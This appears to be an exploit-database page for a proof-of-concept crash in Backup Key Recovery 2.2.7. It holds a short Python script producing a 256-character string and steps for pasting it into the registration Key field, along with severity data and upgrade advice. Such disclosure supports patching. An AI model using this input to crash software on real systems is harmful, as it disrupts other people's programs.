header-logo
Suggest Exploit
vendor:
Backup Key Recovery
by:
Erick Galindo
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Backup Key Recovery
Affected Version From: 2.2.7.0
Affected Version To: 2.2.7.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:nsasoft:backup_key_recovery
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2021

Backup Key Recovery 2.2.7 – Denial of Service (PoC)

Backup Key Recovery 2.2.7 is vulnerable to a denial of service attack. An attacker can craft a malicious string of 256 A's and paste it into the 'Key' field of the 'Enter Registration Code' window. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Backup Key Recovery.
Source

Exploit-DB raw data:

# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo 
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Version: 2.2.7.0
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open BackupKeyRecovery.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok

buffer = "\x41" * 256

f = open ("poc.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR